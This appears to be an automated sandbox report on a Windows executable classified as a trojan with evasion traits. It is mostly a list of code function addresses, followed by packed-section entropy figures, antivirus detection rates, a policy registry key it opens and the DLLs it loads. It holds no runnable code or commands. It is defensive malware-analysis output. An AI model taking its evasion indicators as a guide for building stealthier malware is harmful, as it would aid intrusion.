Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	Code function: 0_2_00207513	0_2_00207513
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	Code function: 0_2_001FE552	0_2_001FE552
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	Code function: 0_2_00194560	0_2_00194560
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	Code function: 0_2_001E5560	0_2_001E5560
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	Code function: 0_2_002115A6	0_2_002115A6
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	Code function: 0_2_001E4587	0_2_001E4587
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	Code function: 0_2_001DF587	0_2_001DF587
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	Code function: 0_2_0020E5BB	0_2_0020E5BB
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	Code function: 0_2_001AC5A0	0_2_001AC5A0
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	Code function: 0_2_0020D5E9	0_2_0020D5E9
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	Code function: 0_2_001AA5D4	0_2_001AA5D4
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	Code function: 0_2_002065FC	0_2_002065FC
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	Code function: 0_2_001765F0	0_2_001765F0
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	Code function: 0_2_0020A5CE	0_2_0020A5CE
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	Code function: 0_2_001F05E2	0_2_001F05E2
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	Code function: 0_2_0018961B	0_2_0018961B
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	Code function: 0_2_001D8618	0_2_001D8618
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	Code function: 0_2_001F2607	0_2_001F2607
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	Code function: 0_2_0017F60D	0_2_0017F60D
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	Code function: 0_2_0018E630	0_2_0018E630
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	Code function: 0_2_001DD655	0_2_001DD655
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	Code function: 0_2_001A8650	0_2_001A8650
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	Code function: 0_2_001FB668	0_2_001FB668
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	Code function: 0_2_0017E687	0_2_0017E687
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	Code function: 0_2_002036B7	0_2_002036B7
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	Code function: 0_2_002266BA	0_2_002266BA
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	Code function: 0_2_001EE681	0_2_001EE681
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	Code function: 0_2_001EC6B2	0_2_001EC6B2
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	Code function: 0_2_001D26B3	0_2_001D26B3
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	Code function: 0_2_001D46AF	0_2_001D46AF
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	Code function: 0_2_001FC6A2	0_2_001FC6A2
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	Code function: 0_2_001946D0	0_2_001946D0
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	Code function: 0_2_0020B6F4	0_2_0020B6F4
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	Code function: 0_2_0020C6C2	0_2_0020C6C2
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	Code function: 0_2_001B06F0	0_2_001B06F0
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	Code function: 0_2_0021F6D9	0_2_0021F6D9
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	Code function: 0_2_00225723	0_2_00225723
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	Code function: 0_2_00217731	0_2_00217731
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	Code function: 0_2_0021B737	0_2_0021B737
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	Code function: 0_2_00199739	0_2_00199739
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	Code function: 0_2_001F475C	0_2_001F475C
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	Code function: 0_2_00231760	0_2_00231760
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	Code function: 0_2_00182750	0_2_00182750
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	Code function: 0_2_0021076B	0_2_0021076B
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	Code function: 0_2_00197740	0_2_00197740
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	Code function: 0_2_001E177D	0_2_001E177D
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	Code function: 0_2_0020F75A	0_2_0020F75A
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	Code function: 0_2_00179780	0_2_00179780
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	Code function: 0_2_001EA780	0_2_001EA780
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	Code function: 0_2_001E3781	0_2_001E3781
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	Code function: 0_2_0021E788	0_2_0021E788
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	Code function: 0_2_001F67DF	0_2_001F67DF
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	Code function: 0_2_001EB7D8	0_2_001EB7D8
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	Code function: 0_2_001857C0	0_2_001857C0
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	Code function: 0_2_001FB80D	0_2_001FB80D
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	Code function: 0_2_00227807	0_2_00227807
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	Code function: 0_2_0017D83C	0_2_0017D83C
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	Code function: 0_2_0022A80D	0_2_0022A80D
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	Code function: 0_2_001F882A	0_2_001F882A
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	Code function: 0_2_001F1823	0_2_001F1823
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	Code function: 0_2_00202861	0_2_00202861
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	Code function: 0_2_0021586B	0_2_0021586B
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	Code function: 0_2_00329863	0_2_00329863
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	Code function: 0_2_0017C840	0_2_0017C840
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	Code function: 0_2_0020D877	0_2_0020D877
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	Code function: 0_2_001E287A	0_2_001E287A
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	Code function: 0_2_001DE877	0_2_001DE877
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	Code function: 0_2_00229850	0_2_00229850
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	Code function: 0_2_00220851	0_2_00220851
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	Code function: 0_2_00211859	0_2_00211859
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	Code function: 0_2_002128A1	0_2_002128A1
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	Code function: 0_2_001FE89B	0_2_001FE89B
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	Code function: 0_2_001FF882	0_2_001FF882
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	Code function: 0_2_0022D8BD	0_2_0022D8BD
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	Code function: 0_2_001A88B0	0_2_001A88B0
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	Code function: 0_2_001DD8AE	0_2_001DD8AE
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	Code function: 0_2_0018C8A0	0_2_0018C8A0
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	Code function: 0_2_001E38D8	0_2_001E38D8
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	Code function: 0_2_001A38D0	0_2_001A38D0
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	Code function: 0_2_001738C0	0_2_001738C0
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	Code function: 0_2_0022F8F8	0_2_0022F8F8
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	Code function: 0_2_002288FC	0_2_002288FC
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	Code function: 0_2_0032E8D0	0_2_0032E8D0
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	Code function: 0_2_001D18FF	0_2_001D18FF
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	Code function: 0_2_0018B8F6	0_2_0018B8F6
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	Code function: 0_2_001E791E	0_2_001E791E
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	Code function: 0_2_00221924	0_2_00221924
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	Code function: 0_2_00196910	0_2_00196910
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	Code function: 0_2_0033A939	0_2_0033A939
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	Code function: 0_2_001D5916	0_2_001D5916
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	Code function: 0_2_001D3911	0_2_001D3911
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	Code function: 0_2_001EE913	0_2_001EE913
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	Code function: 0_2_00175900	0_2_00175900
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	Code function: 0_2_00213910	0_2_00213910
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	Code function: 0_2_0033297B	0_2_0033297B
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	Code function: 0_2_001ED94C	0_2_001ED94C
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	Code function: 0_2_001F297F	0_2_001F297F
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	Code function: 0_2_001E897C	0_2_001E897C
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	Code function: 0_2_00225941	0_2_00225941
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	Code function: 0_2_0021A944	0_2_0021A944
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	Code function: 0_2_0018E960	0_2_0018E960
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	Code function: 0_2_00224959	0_2_00224959
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	Code function: 0_2_001939B9	0_2_001939B9
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	Code function: 0_2_00214988	0_2_00214988
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	Code function: 0_2_0022398E	0_2_0022398E
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	Code function: 0_2_002229C3	0_2_002229C3
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	Code function: 0_2_0021D9C4	0_2_0021D9C4
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	Code function: 0_2_001DA9F6	0_2_001DA9F6
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	Code function: 0_2_0020C9CB	0_2_0020C9CB
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	Code function: 0_2_003249C3	0_2_003249C3
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	Code function: 0_2_0019C9EB	0_2_0019C9EB
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	Code function: 0_2_002069D8	0_2_002069D8
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	Code function: 0_2_001B09E0	0_2_001B09E0
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	Code function: 0_2_003269CC	0_2_003269CC
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	Code function: 0_2_001AFA20	0_2_001AFA20
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	Code function: 0_2_001EFA5A	0_2_001EFA5A
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	Code function: 0_2_00228A65	0_2_00228A65
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	Code function: 0_2_001A5A4F	0_2_001A5A4F
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	Code function: 0_2_001ADA4D	0_2_001ADA4D
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	Code function: 0_2_001ACA40	0_2_001ACA40
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	Code function: 0_2_0022BA7F	0_2_0022BA7F
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	Code function: 0_2_001DBA71	0_2_001DBA71
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	Code function: 0_2_00211A4F	0_2_00211A4F
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	Code function: 0_2_0021FA59	0_2_0021FA59
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	Code function: 0_2_0022CA58	0_2_0022CA58
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	Code function: 0_2_00218AB7	0_2_00218AB7
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	Code function: 0_2_001A9A80	0_2_001A9A80
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	Code function: 0_2_0021BABB	0_2_0021BABB
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	Code function: 0_2_001FDABE	0_2_001FDABE
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	Code function: 0_2_00198ABC	0_2_00198ABC
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	Code function: 0_2_001D8AB4	0_2_001D8AB4
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	Code function: 0_2_00226A91	0_2_00226A91
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	Code function: 0_2_0020DA9B	0_2_0020DA9B
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	Code function: 0_2_0020AAE2	0_2_0020AAE2
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	Code function: 0_2_001DCADA	0_2_001DCADA
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	Code function: 0_2_00189AD0	0_2_00189AD0
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	Code function: 0_2_001E0AD3	0_2_001E0AD3
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	Code function: 0_2_001D6AE7	0_2_001D6AE7
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	Code function: 0_2_00188B12	0_2_00188B12
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	Code function: 0_2_001AFB10	0_2_001AFB10
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	Code function: 0_2_001DDB0F	0_2_001DDB0F
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	Code function: 0_2_00333B1C	0_2_00333B1C
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	Code function: 0_2_00208B1A	0_2_00208B1A
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	Code function: 0_2_001E1B5A	0_2_001E1B5A
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	Code function: 0_2_001FAB57	0_2_001FAB57
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	Code function: 0_2_00222B6A	0_2_00222B6A
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	Code function: 0_2_001D0B4E	0_2_001D0B4E
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	Code function: 0_2_0022AB71	0_2_0022AB71
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	Code function: 0_2_001F3B4B	0_2_001F3B4B
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	Code function: 0_2_0017AB40	0_2_0017AB40
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	Code function: 0_2_001D2B40	0_2_001D2B40
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	Code function: 0_2_001F7B9F	0_2_001F7B9F
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	Code function: 0_2_00206BAF	0_2_00206BAF
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	Code function: 0_2_0018EB80	0_2_0018EB80
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	Code function: 0_2_00212BBD	0_2_00212BBD
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	Code function: 0_2_00174BA0	0_2_00174BA0
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	Code function: 0_2_00229BF2	0_2_00229BF2
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	Code function: 0_2_001FCBFE	0_2_001FCBFE
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	Code function: 0_2_00230BC1	0_2_00230BC1
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	Code function: 0_2_001A3C10	0_2_001A3C10
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	Code function: 0_2_001EAC0D	0_2_001EAC0D
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	Code function: 0_2_001E6C0B	0_2_001E6C0B
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	Code function: 0_2_0021EC37	0_2_0021EC37
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	Code function: 0_2_00201C3B	0_2_00201C3B
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	Code function: 0_2_00202C65	0_2_00202C65
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	Code function: 0_2_001E3C45	0_2_001E3C45
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	Code function: 0_2_001FEC73	0_2_001FEC73
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	Code function: 0_2_001EDC66	0_2_001EDC66
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	Code function: 0_2_0022CCB0	0_2_0022CCB0
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	Code function: 0_2_001E7C8D	0_2_001E7C8D
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	Code function: 0_2_0020FC85	0_2_0020FC85
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	Code function: 0_2_00184CA0	0_2_00184CA0
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	Code function: 0_2_001D3CDF	0_2_001D3CDF
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	Code function: 0_2_001EECCB	0_2_001EECCB
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	Code function: 0_2_0020ECFD	0_2_0020ECFD
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	Code function: 0_2_001A1CF0	0_2_001A1CF0
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	Code function: 0_2_001F0CF3	0_2_001F0CF3
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	Code function: 0_2_001FBCE0	0_2_001FBCE0
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	Code function: 0_2_00204D2C	0_2_00204D2C
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	Code function: 0_2_00229D2E	0_2_00229D2E
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	Code function: 0_2_00221D2C	0_2_00221D2C
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	Code function: 0_2_00203D33	0_2_00203D33
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	Code function: 0_2_00191D00	0_2_00191D00
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	Code function: 0_2_001F4D06	0_2_001F4D06
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	Code function: 0_2_001A9D30	0_2_001A9D30
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	Code function: 0_2_00181D2B	0_2_00181D2B
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	Code function: 0_2_00196D2E	0_2_00196D2E
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	Code function: 0_2_001B0D20	0_2_001B0D20
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	Code function: 0_2_0019CD5E	0_2_0019CD5E
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	Code function: 0_2_00327D7A	0_2_00327D7A
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	Code function: 0_2_0019CD4C	0_2_0019CD4C
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	Code function: 0_2_001D1D48	0_2_001D1D48
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	Code function: 0_2_001FFD7B	0_2_001FFD7B
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	Code function: 0_2_001AFD70	0_2_001AFD70
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	Code function: 0_2_0022EDAB	0_2_0022EDAB
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	Code function: 0_2_00200DB4	0_2_00200DB4
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	Code function: 0_2_0022DD80	0_2_0022DD80
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	Code function: 0_2_001DBDBE	0_2_001DBDBE
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	Code function: 0_2_00216D8D	0_2_00216D8D
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	Code function: 0_2_001D8DB2	0_2_001D8DB2
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	Code function: 0_2_001A7DA9	0_2_001A7DA9
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	Code function: 0_2_001F6DA2	0_2_001F6DA2
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	Code function: 0_2_001D6DDE	0_2_001D6DDE
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	Code function: 0_2_00228DE9	0_2_00228DE9
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	Code function: 0_2_0021DDF5	0_2_0021DDF5
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	Code function: 0_2_001ACDF0	0_2_001ACDF0
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	Code function: 0_2_0020CE37	0_2_0020CE37
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	Code function: 0_2_00335E2A	0_2_00335E2A
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	Code function: 0_2_001AFE00	0_2_001AFE00
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	Code function: 0_2_0020BE3D	0_2_0020BE3D
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	Code function: 0_2_00215E3E	0_2_00215E3E
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	Code function: 0_2_00338E12	0_2_00338E12
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	Code function: 0_2_00205E09	0_2_00205E09
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	Code function: 0_2_00217E0E	0_2_00217E0E
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	Code function: 0_2_001F9E28	0_2_001F9E28
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	Code function: 0_2_0017CE45	0_2_0017CE45
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	Code function: 0_2_001D4E71	0_2_001D4E71
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	Code function: 0_2_0019FE74	0_2_0019FE74
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	Code function: 0_2_0022FE52	0_2_0022FE52
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	Code function: 0_2_00231E52	0_2_00231E52
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	Code function: 0_2_00192E6D	0_2_00192E6D
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	Code function: 0_2_001E0E6A	0_2_001E0E6A
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	Code function: 0_2_00190E6C	0_2_00190E6C
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	Code function: 0_2_0019EE63	0_2_0019EE63
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	Code function: 0_2_00172EB0	0_2_00172EB0
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	Code function: 0_2_0018AEB0	0_2_0018AEB0
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	Code function: 0_2_001D2EB1	0_2_001D2EB1
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	Code function: 0_2_001FDEB0	0_2_001FDEB0
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	Code function: 0_2_00223E8D	0_2_00223E8D
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	Code function: 0_2_00221E9A	0_2_00221E9A
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	Code function: 0_2_001A8EA0	0_2_001A8EA0
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	Code function: 0_2_001E3EDC	0_2_001E3EDC
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	Code function: 0_2_00207EEC	0_2_00207EEC
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	Code function: 0_2_00214EC6	0_2_00214EC6
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	Code function: 0_2_00208ECF	0_2_00208ECF
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	Code function: 0_2_00195F1B	0_2_00195F1B
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	Code function: 0_2_001DDF16	0_2_001DDF16
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	Code function: 0_2_001ECF12	0_2_001ECF12
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	Code function: 0_2_00209F01	0_2_00209F01
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	Code function: 0_2_0033DF1D	0_2_0033DF1D
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	Code function: 0_2_00200F1E	0_2_00200F1E
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	Code function: 0_2_0018DF50	0_2_0018DF50
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	Code function: 0_2_00186F52	0_2_00186F52
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	Code function: 0_2_001E1F79	0_2_001E1F79
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	Code function: 0_2_001D8F6F	0_2_001D8F6F
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	Code function: 0_2_001FEFAC	0_2_001FEFAC
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	Code function: 0_2_00220F95	0_2_00220F95
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	Code function: 0_2_001F2FA6	0_2_001F2FA6
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	Code function: 0_2_00222F9D	0_2_00222F9D
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	Code function: 0_2_0020FFE2	0_2_0020FFE2
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	Code function: 0_2_00218FF7	0_2_00218FF7
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	Code function: 0_2_001FCFE0	0_2_001FCFE0

Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	Code function: String function: 00184C90 appears 77 times
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	Code function: String function: 00177F60 appears 40 times

Source: Ebgl8jb6CW.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: Ebgl8jb6CW.exe	Static PE information: Section: ZLIB complexity 0.9994893790849673
Source: Ebgl8jb6CW.exe	Static PE information: Section: umgaveln ZLIB complexity 0.9947447593167702

Source: Ebgl8jb6CW.exe

Static PE information: Entrypont disasm: arithmetic instruction to all instruction ratio: 1.0 > 0.5 instr diversity: 0.5

Source: classification engine

Classification label: mal100.troj.evad.winEXE@1/0@11/2

Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe

Code function: 0_2_001A2070 CoCreateInstance,

0_2_001A2070

Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: Ebgl8jb6CW.exe	ReversingLabs: Detection: 52%
Source: Ebgl8jb6CW.exe	Virustotal: Detection: 51%

Source: Ebgl8jb6CW.exe

String found in binary or memory: 3Cannot find '%s'. Please, re-install this application

Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe

File read: C:\Users\user\Desktop\Ebgl8jb6CW.exe

Jump to behavior

Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	Section loaded: winhttp.dll	Jump to behavior
